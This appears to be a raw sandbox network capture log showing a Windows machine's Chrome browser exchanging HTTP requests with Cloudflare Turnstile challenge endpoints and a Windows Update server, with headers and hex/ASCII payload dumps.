                                                    2024-11-25 18:44:02 UTC379INHTTP/1.1 404 Not Found
                                                    Date: Mon, 25 Nov 2024 18:44:02 GMT
                                                    Content-Type: application/json
                                                    Content-Length: 7
                                                    Connection: close
                                                    cf-chl-out: sf34ndK2POk4mVYHFRGNBhHtm3aIR8XCm+M=$nhe1nX67ke0WvDPJ
                                                    cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                    Server: cloudflare
                                                    CF-RAY: 8e83c9aa9f2f4299-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-11-25 18:44:02 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                    Data Ascii: invalid


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    20192.168.2.449765104.18.94.414432200C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:44:02 UTC815OUTGET /cdn-cgi/challenge-platform/h/g/pat/8e83c97ff9621a48/1732560240060/ec9946d522a774066924225e9979f9a285d0363b428f53c5859ec557411cd08f/gqZRZaI8vUHtMGS HTTP/1.1
                                                    Host: challenges.cloudflare.com
                                                    Connection: keep-alive
                                                    Cache-Control: max-age=0
                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                    sec-ch-ua-mobile: ?0
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                    sec-ch-ua-platform: "Windows"
                                                    Accept: */*
                                                    Sec-Fetch-Site: same-origin
                                                    Sec-Fetch-Mode: cors
                                                    Sec-Fetch-Dest: empty
                                                    Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/a7tsf/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    2024-11-25 18:44:02 UTC143INHTTP/1.1 401 Unauthorized
                                                    Date: Mon, 25 Nov 2024 18:44:02 GMT
                                                    Content-Type: text/plain; charset=UTF-8
                                                    Content-Length: 1
                                                    Connection: close
                                                    2024-11-25 18:44:02 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 37 4a 6c 47 31 53 4b 6e 64 41 5a 70 4a 43 4a 65 6d 58 6e 35 6f 6f 58 51 4e 6a 74 43 6a 31 50 46 68 5a 37 46 56 30 45 63 30 49 38 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                    Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20g7JlG1SKndAZpJCJemXn5ooXQNjtCj1PFhZ7FV0Ec0I8AGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                    2024-11-25 18:44:02 UTC1INData Raw: 4a
                                                    Data Ascii: J


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    21192.168.2.4497624.175.87.197443
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:44:03 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=pTKuk7a711u7zdz&MD=9dooWE6s HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                    Host: slscr.update.microsoft.com
                                                    2024-11-25 18:44:03 UTC560INHTTP/1.1 200 OK
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    Content-Type: application/octet-stream
                                                    Expires: -1
                                                    Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                    ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                    MS-CorrelationId: 16c308fe-2fbf-472d-b63b-755e358d0217
                                                    MS-RequestId: d81d6158-e040-4d73-8d79-c8bcfce46e8f
                                                    MS-CV: BM35srzRQU2tLbrw.0
                                                    X-Microsoft-SLSClientCache: 2880
                                                    Content-Disposition: attachment; filename=environment.cab
                                                    X-Content-Type-Options: nosniff
                                                    Date: Mon, 25 Nov 2024 18:44:02 GMT
                                                    Connection: close
                                                    Content-Length: 24490
                                                    2024-11-25 18:44:03 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                    Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                    2024-11-25 18:44:03 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                    Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    22192.168.2.449767104.18.94.414432200C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:44:03 UTC786OUTGET /cdn-cgi/challenge-platform/h/g/i/8e83c97ff9621a48/1732560240060/F7F6o63uyBc_7o8 HTTP/1.1
                                                    Host: challenges.cloudflare.com
                                                    Connection: keep-alive
                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                    sec-ch-ua-mobile: ?0
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                    sec-ch-ua-platform: "Windows"
                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                    Sec-Fetch-Site: same-origin
                                                    Sec-Fetch-Mode: no-cors
                                                    Sec-Fetch-Dest: image
                                                    Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/a7tsf/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    2024-11-25 18:44:04 UTC200INHTTP/1.1 200 OK
                                                    Date: Mon, 25 Nov 2024 18:44:04 GMT
                                                    Content-Type: image/png
                                                    Content-Length: 61
                                                    Connection: close
                                                    Server: cloudflare
                                                    CF-RAY: 8e83c9b6793043d6-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-11-25 18:44:04 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 50 00 00 00 43 08 02 00 00 00 84 31 15 cf 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                    Data Ascii: PNGIHDRPC1IDAT$IENDB`


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    23192.168.2.449770104.18.95.414432200C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:44:05 UTC428OUTGET /cdn-cgi/challenge-platform/h/g/i/8e83c97ff9621a48/1732560240060/F7F6o63uyBc_7o8 HTTP/1.1
                                                    Host: challenges.cloudflare.com
                                                    Connection: keep-alive
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                    Accept: */*
                                                    Sec-Fetch-Site: none
                                                    Sec-Fetch-Mode: cors
                                                    Sec-Fetch-Dest: empty
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    2024-11-25 18:44:06 UTC200INHTTP/1.1 200 OK
                                                    Date: Mon, 25 Nov 2024 18:44:05 GMT
                                                    Content-Type: image/png
                                                    Content-Length: 61
                                                    Connection: close
                                                    Server: cloudflare
                                                    CF-RAY: 8e83c9c11f568c45-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-11-25 18:44:06 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 50 00 00 00 43 08 02 00 00 00 84 31 15 cf 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                    Data Ascii: PNGIHDRPC1IDAT$IENDB`


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    24192.168.2.449771104.18.94.414432200C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:44:05 UTC1175OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/717006795:1732559173:kR_0HaZjcMZ7NfcZjqJuMDbFTXd9SIuUQzr_to9VflA/8e83c97ff9621a48/QWQsdJI..ng.S_E0NSLTwx4vMMqFdMlyiLvXMg2W.bA-1732560235-1.1.1.1-tyv.fmORLOP0o6ZDwUZKHTQB_0sn6fnqojbSmrY7nOw7eNcPKLaZ4jJdNlCOZxav HTTP/1.1
                                                    Host: challenges.cloudflare.com
                                                    Connection: keep-alive
                                                    Content-Length: 27844
                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                    Content-type: application/x-www-form-urlencoded
                                                    CF-Chl-RetryAttempt: 0
                                                    sec-ch-ua-mobile: ?0
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                    CF-Challenge: QWQsdJI..ng.S_E0NSLTwx4vMMqFdMlyiLvXMg2W.bA-1732560235-1.1.1.1-tyv.fmORLOP0o6ZDwUZKHTQB_0sn6fnqojbSmrY7nOw7eNcPKLaZ4jJdNlCOZxav
                                                    sec-ch-ua-platform: "Windows"
                                                    Accept: */*
                                                    Origin: https://challenges.cloudflare.com
                                                    Sec-Fetch-Site: same-origin
                                                    Sec-Fetch-Mode: cors
                                                    Sec-Fetch-Dest: empty
                                                    Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/a7tsf/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    2024-11-25 18:44:05 UTC16384OUTData Raw: 76 5f 38 65 38 33 63 39 37 66 66 39 36 32 31 61 34 38 3d 62 63 47 6b 53 55 5a 49 25 32 62 5a 47 55 63 64 56 58 61 58 77 58 41 48 4b 5a 45 58 4e 58 4f 57 64 4b 58 48 58 6d 67 58 38 55 63 58 6e 58 6f 67 48 33 36 5a 52 58 56 42 77 58 5a 2b 67 58 45 64 58 4b 32 75 43 67 67 58 42 57 55 24 6f 41 46 41 57 58 4a 58 6e 31 38 55 58 4c 33 43 79 58 6c 6b 58 36 58 62 6b 55 38 58 6b 7a 79 77 6b 58 76 47 36 63 38 58 4f 6b 55 56 58 59 6c 54 62 67 58 6a 4c 57 55 79 56 6d 30 6f 33 5a 69 78 78 4b 4b 5a 6c 4b 4b 66 37 54 67 5a 6a 6e 52 2d 4c 58 4b 6c 31 54 2d 4b 58 4c 66 7a 47 6b 5a 62 57 61 4c 53 63 6c 38 46 67 59 42 4f 6e 70 58 67 63 44 38 66 62 56 33 33 58 5a 57 5a 41 4b 62 4b 43 55 45 56 39 6d 2d 43 31 58 61 73 62 58 4b 66 43 61 6c 4b 69 35 2b 54 24 34 73 53 37 75 62 78
                                                    Data Ascii: v_8e83c97ff9621a48=bcGkSUZI%2bZGUcdVXaXwXAHKZEXNXOWdKXHXmgX8UcXnXogH36ZRXVBwXZ+gXEdXK2uCggXBWU$oAFAWXJXn18UXL3CyXlkX6XbkU8XkzywkXvG6c8XOkUVXYlTbgXjLWUyVm0o3ZixxKKZlKKf7TgZjnR-LXKl1T-KXLfzGkZbWaLScl8FgYBOnpXgcD8fbV33XZWZAKbKCUEV9m-C1XasbXKfCalKi5+T$4sS7ubx
                                                    2024-11-25 18:44:05 UTC11460OUTData Raw: 38 4b 75 5a 49 5a 6d 67 2b 58 70 58 56 63 64 36 55 39 58 4e 67 73 43 32 37 78 47 55 70 71 6a 34 6c 54 58 71 58 2b 39 2b 6b 55 2b 58 6b 6b 62 6b 5a 68 58 32 58 62 48 2b 71 57 4f 58 73 57 5a 7a 58 6c 58 41 56 5a 75 58 74 6b 55 67 58 58 58 66 4c 47 58 39 58 34 58 4c 58 48 46 58 65 38 52 47 58 78 58 62 2b 55 58 5a 61 58 32 6b 52 2b 5a 72 6b 75 58 4c 63 58 6e 58 75 58 64 75 5a 32 58 6c 6b 73 6e 5a 6e 58 4a 49 64 63 58 6f 58 4f 63 73 6a 58 34 67 6f 58 6e 78 55 4f 6b 54 58 5a 58 41 58 5a 2d 34 76 58 41 6b 5a 44 58 4c 6b 55 32 35 37 6b 4b 33 5a 4b 58 50 57 70 58 52 32 58 30 58 58 63 6b 47 58 42 58 56 63 41 69 58 31 56 52 57 58 55 58 24 58 73 6b 64 34 58 71 58 6d 2b 58 61 58 74 58 5a 2b 58 44 58 71 6b 48 58 55 4f 6b 66 58 42 75 5a 69 58 53 6b 4c 57 55 32 58 4f 67
                                                    Data Ascii: 8KuZIZmg+XpXVcd6U9XNgsC27xGUpqj4lTXqX+9+kU+XkkbkZhX2XbH+qWOXsWZzXlXAVZuXtkUgXXXfLGX9X4XLXHFXe8RGXxXb+UXZaX2kR+ZrkuXLcXnXuXduZ2XlksnZnXJIdcXoXOcsjX4goXnxUOkTXZXAXZ-4vXAkZDXLkU257kK3ZKXPWpXR2X0XXckGXBXVcAiX1VRWXUX$Xskd4XqXm+XaXtXZ+XDXqkHXUOkfXBuZiXSkLWU2XOg
                                                    2024-11-25 18:44:06 UTC334INHTTP/1.1 200 OK
                                                    Date: Mon, 25 Nov 2024 18:44:06 GMT
                                                    Content-Type: text/plain; charset=UTF-8
                                                    Content-Length: 22948
                                                    Connection: close
                                                    cf-chl-gen: 3sK83zIPhSlleLlpFPzBU99RFhonyvYLK7LnB80MLvackmBsspz95oyr9dtnev13V5BA+KoUx1B6h9fSeA==$bBqBMqgh44JRGEVu
                                                    Server: cloudflare
                                                    CF-RAY: 8e83c9c1bc02334e-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-11-25 18:44:06 UTC1035INData Raw: 6a 48 2b 46 66 49 69 52 53 58 74 61 68 4a 53 4f 68 4a 61 4d 6b 35 4e 4f 55 4b 4f 6d 5a 55 75 6a 6c 70 79 54 6e 36 68 67 6b 6f 39 6c 6b 33 52 66 6d 6d 46 32 58 4c 53 6e 72 61 53 77 75 58 47 6a 6f 48 65 6b 68 58 43 73 63 6f 64 74 62 6d 39 77 78 37 50 46 64 4c 53 35 76 62 65 38 77 73 65 37 77 4e 4c 58 67 4a 36 43 78 4e 62 4d 32 39 54 4e 31 39 37 65 78 35 33 4c 71 6e 71 52 6b 70 4f 55 36 39 66 70 6d 4f 7a 66 36 65 44 50 34 2f 44 31 35 76 58 33 70 4d 4b 6d 36 50 72 77 41 50 6a 78 2b 77 4d 44 36 38 4c 76 7a 70 36 66 74 72 65 34 75 51 51 43 76 4d 58 39 41 77 63 42 42 67 77 52 42 51 6f 63 49 64 63 63 39 42 38 58 2b 65 4c 51 37 75 2f 77 31 4f 58 66 31 7a 54 44 78 4e 76 63 33 64 37 66 34 4f 48 69 49 79 67 73 4a 69 73 78 4e 69 6f 76 51 55 62 75 44 66 42 4e 33 50 50
                                                    Data Ascii: jH+FfIiRSXtahJSOhJaMk5NOUKOmZUujlpyTn6hgko9lk3RfmmF2XLSnraSwuXGjoHekhXCscodtbm9wx7PFdLS5vbe8wse7wNLXgJ6CxNbM29TN197ex53LqnqRkpOU69fpmOzf6eDP4/D15vX3pMKm6PrwAPjx+wMD68Lvzp6ftre4uQQCvMX9AwcBBgwRBQocIdcc9B8X+eLQ7u/w1OXf1zTDxNvc3d7f4OHiIygsJisxNiovQUbuDfBN3PP
                                                    2024-11-25 18:44:06 UTC1369INData Raw: 41 51 55 4a 44 52 45 57 63 6f 48 2b 62 6e 46 39 6d 54 61 57 59 6e 70 57 68 71 6d 4b 55 6d 5a 32 58 6e 4b 4b 6e 6d 36 79 75 73 32 36 6b 71 71 2b 46 74 61 2b 39 6b 61 31 32 56 57 78 74 62 6d 39 77 63 58 4a 7a 64 48 56 32 64 37 47 6e 71 37 57 4e 6c 33 37 57 79 63 2f 47 30 74 75 54 78 63 72 4f 79 4d 33 54 32 4d 7a 64 33 2b 53 66 31 64 76 67 74 75 62 67 79 2b 4c 75 34 4f 66 69 39 36 75 4b 6f 61 4b 6a 70 4b 57 6d 70 36 69 70 71 71 75 73 32 2f 48 62 38 2f 72 48 7a 62 51 4e 41 41 62 38 43 52 4c 4a 2b 77 45 46 2f 67 51 4b 44 77 4d 55 46 68 76 56 44 42 49 58 37 42 30 58 37 78 4d 6c 47 79 49 69 34 4c 2f 57 31 39 6a 5a 32 74 76 63 33 64 37 66 34 4f 45 4e 47 52 41 65 50 50 77 44 36 55 49 31 4f 7a 49 2b 52 2f 34 78 4e 6a 6f 30 4f 54 39 45 4f 45 6c 4c 55 41 74 42 52 30
                                                    Data Ascii: AQUJDREWcoH+bnF9mTaWYnpWhqmKUmZ2XnKKnm6yus26kqq+Fta+9ka12VWxtbm9wcXJzdHV2d7Gnq7WNl37Wyc/G0tuTxcrOyM3T2Mzd3+Sf1dvgtubgy+Lu4Ofi96uKoaKjpKWmp6ipqqus2/Hb8/rHzbQNAAb8CRLJ+wEF/gQKDwMUFhvVDBIX7B0X7xMlGyIi4L/W19jZ2tvc3d7f4OENGRAePPwD6UI1OzI+R/4xNjo0OT9EOElLUAtBR0
                                                    2024-11-25 18:44:06 UTC1369INData Raw: 52 30 68 4a 53 6b 75 6a 67 70 43 42 61 47 74 53 71 70 32 6a 6d 71 61 76 5a 35 6d 65 6f 70 79 68 70 36 79 67 73 62 4f 34 63 37 79 51 6d 72 43 65 66 6d 78 36 62 73 61 35 76 37 62 43 79 34 4f 31 75 72 36 34 76 63 50 49 76 4d 33 50 31 49 2b 6c 74 64 7a 4f 71 5a 75 55 63 34 71 4c 6a 49 32 4f 6a 35 43 52 6b 70 4f 55 6c 62 76 72 7a 39 36 39 73 4c 61 64 39 65 6a 75 35 66 48 36 73 75 54 70 37 65 66 73 38 76 66 72 2f 50 34 45 76 74 59 48 36 76 6e 59 79 38 4f 69 75 62 71 37 76 4c 32 2b 76 38 44 42 77 73 50 45 38 42 49 4c 37 76 48 67 35 63 77 6c 47 42 34 56 49 53 72 68 46 42 6b 64 46 78 77 69 4a 78 73 73 4c 6a 50 74 44 43 30 6d 43 67 33 37 38 74 48 6f 36 65 72 72 37 4f 33 75 37 30 34 4e 33 4e 33 30 39 66 62 33 2b 50 6e 36 2b 31 4d 2f 55 51 42 48 56 46 4a 52 4b 45 35
                                                    Data Ascii: R0hJSkujgpCBaGtSqp2jmqavZ5meopyhp6ygsbO4c7yQmrCefmx6bsa5v7bCy4O1ur64vcPIvM3P1I+ltdzOqZuUc4qLjI2Oj5CRkpOUlbvrz969sLad9eju5fH6suTp7efs8vfr/P4EvtYH6vnYy8Oiubq7vL2+v8DBwsPE8BIL7vHg5cwlGB4VISrhFBkdFxwiJxssLjPtDC0mCg378tHo6err7O3u704N3N309fb3+Pn6+1M/UQBHVFJRKE5
                                                    2024-11-25 18:44:06 UTC1369INData Raw: 55 35 50 56 6c 64 53 6c 36 4f 59 71 36 53 64 70 36 35 70 6e 71 79 69 75 47 36 71 73 4c 47 70 74 34 36 62 6c 5a 56 71 69 49 6d 4b 62 6e 61 73 76 33 6c 64 64 48 56 32 64 33 68 35 65 6e 74 38 66 58 35 2f 68 6f 65 43 78 39 50 49 32 39 54 4e 31 39 36 5a 31 4e 4c 50 30 35 37 55 34 65 44 6b 31 75 6a 63 76 4f 6a 64 38 4f 6e 69 37 50 50 51 38 50 58 73 2b 4f 37 31 39 62 44 74 2b 65 34 43 2b 76 50 39 42 62 2f 30 41 2f 67 50 76 36 47 34 75 62 71 37 76 4c 32 2b 76 38 44 42 77 73 50 4b 79 38 59 66 45 68 67 50 47 79 54 62 44 68 4d 58 45 52 59 63 49 52 55 6d 4b 43 33 6e 2f 69 63 47 46 42 44 7a 37 6a 4d 34 4b 54 63 2f 47 69 30 31 4c 79 35 41 50 45 44 32 39 6b 52 47 54 45 41 36 2f 41 41 47 50 45 6c 49 54 44 35 51 52 43 52 51 52 56 68 52 53 6c 52 62 4f 46 68 64 56 47 42 57
                                                    Data Ascii: U5PVldSl6OYq6Sdp65pnqyiuG6qsLGpt46blZVqiImKbnasv3lddHV2d3h5ent8fX5/hoeCx9PI29TN196Z1NLP057U4eDk1ujcvOjd8Oni7PPQ8PXs+O719bDt+e4C+vP9Bb/0A/gPv6G4ubq7vL2+v8DBwsPKy8YfEhgPGyTbDhMXERYcIRUmKC3n/icGFBDz7jM4KTc/Gi01Ly5APED29kRGTEA6/AAGPElITD5QRCRQRVhRSlRbOFhdVGBW
                                                    2024-11-25 18:44:06 UTC1369INData Raw: 69 6b 72 57 57 58 6e 4b 43 61 6e 36 57 71 6e 71 2b 78 74 6e 47 49 73 49 2b 64 6d 58 31 34 76 4d 47 79 77 4d 69 6a 74 72 36 34 74 38 6e 46 79 59 43 41 76 73 54 53 68 49 65 49 67 49 65 43 69 37 4c 55 79 73 79 57 72 62 6d 75 77 62 71 7a 76 63 54 51 77 73 4c 48 76 73 72 41 78 38 66 5a 76 38 58 51 77 63 37 4f 7a 38 66 47 32 4d 72 4b 70 77 57 70 32 50 72 77 38 72 7a 54 33 39 54 6e 34 4e 6e 6a 36 76 62 6f 36 4f 33 6b 38 4f 62 74 37 51 44 6e 38 65 2f 77 39 50 33 77 39 76 44 4b 4b 4d 7a 37 48 68 51 57 33 2f 59 44 39 77 73 45 2f 41 63 4f 47 67 77 4d 45 51 67 55 43 68 45 52 49 77 34 54 46 78 51 4f 46 78 41 61 49 51 38 6a 47 53 41 67 4d 69 63 6c 47 78 6f 68 48 79 4d 65 42 65 62 39 2f 67 41 42 41 67 4d 45 42 55 4d 51 49 2f 49 4b 43 77 77 4e 61 2f 6a 35 45 52 49 54 46
                                                    Data Ascii: ikrWWXnKCan6Wqnq+xtnGIsI+dmX14vMGywMijtr64t8nFyYCAvsTShIeIgIeCi7LUysyWrbmuwbqzvcTQwsLHvsrAx8fZv8XQwc7Oz8fG2MrKpwWp2Prw8rzT39Tn4Nnj6vbo6O3k8Obt7QDn8e/w9P3w9vDKKMz7HhQW3/YD9wsE/AcOGgwMEQgUChERIw4TFxQOFxAaIQ8jGSAgMiclGxohHyMeBeb9/gABAgMEBUMQI/IKCwwNa/j5ERITF
                                                    2024-11-25 18:44:06 UTC1369INData Raw: 62 58 46 31 65 58 32 43 34 71 37 47 6f 74 4c 31 31 71 5a 4f 69 6e 48 78 31 64 34 70 61 63 58 4a 7a 64 48 56 32 64 33 68 35 65 6e 74 38 66 58 35 2f 67 4e 36 4f 67 35 57 56 6c 70 65 52 70 48 53 4c 6a 49 32 4f 6a 35 43 52 6b 70 4f 55 6c 5a 62 30 33 65 58 74 34 50 65 48 6e 70 2b 67 6f 61 4b 6a 70 4b 57 6d 70 36 69 70 71 71 75 73 72 66 48 33 38 77 59 4c 37 72 76 6b 2f 50 6b 49 43 63 2f 43 2b 62 33 62 76 39 54 63 72 4d 50 45 78 63 62 48 79 4d 6e 4b 79 38 7a 4e 7a 73 2f 51 30 64 49 58 48 52 6b 72 4d 42 54 67 42 7a 51 46 41 54 44 30 35 78 2f 71 37 4d 37 6c 35 75 66 6f 36 65 72 72 37 4f 33 75 37 2f 42 50 33 50 50 30 39 66 62 33 2b 50 6e 36 2b 2f 7a 39 2f 6b 56 58 52 31 46 59 45 31 5a 5a 54 56 39 50 57 57 41 78 55 31 56 52 5a 6c 35 6e 48 42 34 78 41 52 67 5a 47 68
                                                    Data Ascii: bXF1eX2C4q7GotL11qZOinHx1d4pacXJzdHV2d3h5ent8fX5/gN6Og5WVlpeRpHSLjI2Oj5CRkpOUlZb03eXt4PeHnp+goaKjpKWmp6ipqqusrfH38wYL7rvk/PkICc/C+b3bv9TcrMPExcbHyMnKy8zNzs/Q0dIXHRkrMBTgBzQFATD05x/q7M7l5ufo6err7O3u7/BP3PP09fb3+Pn6+/z9/kVXR1FYE1ZZTV9PWWAxU1VRZl5nHB4xARgZGh
                                                    2024-11-25 18:44:06 UTC1369INData Raw: 59 72 35 4f 5a 57 5a 6e 61 47 6c 71 61 32 78 74 62 6d 39 77 78 37 50 46 64 4c 72 49 79 63 66 4c 6f 38 6e 43 7a 4b 33 42 79 73 62 46 31 34 53 69 68 75 4a 79 69 59 71 4c 6a 49 32 4f 6a 35 43 52 6b 70 4f 55 6c 5a 61 58 6d 4f 62 74 34 72 61 64 36 2f 4c 6e 72 59 79 6a 70 4b 57 6d 70 36 69 70 71 71 75 73 72 61 36 76 73 4c 47 79 43 51 63 43 30 4c 63 4f 44 41 66 48 70 72 32 2b 76 38 44 42 77 73 50 45 78 63 62 48 79 4d 6e 4b 79 38 77 61 47 42 34 57 41 43 4c 74 31 43 49 67 4a 68 34 49 4b 75 66 47 33 64 37 66 34 4f 48 69 34 2b 54 6c 35 75 66 6f 36 65 72 72 37 44 45 2b 50 45 59 2f 51 53 4a 45 45 50 59 37 53 45 5a 51 53 55 73 73 54 67 7a 71 41 67 4d 45 42 51 59 48 43 41 6b 4b 43 77 77 4e 44 67 38 51 45 56 64 6c 5a 6d 52 6f 4d 52 68 65 62 47 31 72 62 77 67 66 49 43 45
                                                    Data Ascii: Yr5OZWZnaGlqa2xtbm9wx7PFdLrIycfLo8nCzK3BysbF14SihuJyiYqLjI2Oj5CRkpOUlZaXmObt4rad6/LnrYyjpKWmp6ipqqusra6vsLGyCQcC0LcODAfHpr2+v8DBwsPExcbHyMnKy8waGB4WACLt1CIgJh4IKufG3d7f4OHi4+Tl5ufo6err7DE+PEY/QSJEEPY7SEZQSUssTgzqAgMEBQYHCAkKCwwNDg8QEVdlZmRoMRhebG1rbwgfICE
